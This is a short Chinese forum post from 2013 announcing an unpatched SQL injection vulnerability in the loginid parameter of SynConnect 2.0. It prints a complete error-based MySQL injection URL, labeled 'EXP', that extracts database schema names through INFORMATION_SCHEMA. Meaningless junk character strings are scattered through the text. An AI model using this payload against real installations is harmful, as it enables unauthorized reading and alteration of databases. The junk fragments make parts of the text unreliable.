SynConnect中的loginid参数中存在SQL注入漏洞,该漏洞源于程序使用SQL查询之前没有充分验证用户提供的输入。攻击者利用该漏洞操控应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。SynConnect 2.0版本中存在漏洞,其他版本也可能受到影响。3 a. t$ i% ]- `; H8 r0 V& \0 f
# r$ b7 C3 f0 V/ v5 Y' \$ u目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:% z6 }* M7 r$ E9 _: h# }* l
http://www.synchroweb.com/prod_syn.php
! ]0 e6 C& S; I- o3 E
# v- A8 }" z. {0 O1 n: Y6 B; JEXP:( b- g6 a5 d( g+ S
- c6 g2 j x2 _( \1 E: [% A$ B4 Mhttp://localhost/index.php?func=logoff&loginid=1011′ AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0×20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘bhdresh’=’bhdresh& @, |( \! c, H4 F
6 }9 x6 w( L- }+ E) ]) j |
发表于 2013-4-4 17:35:25
收藏
支持
反对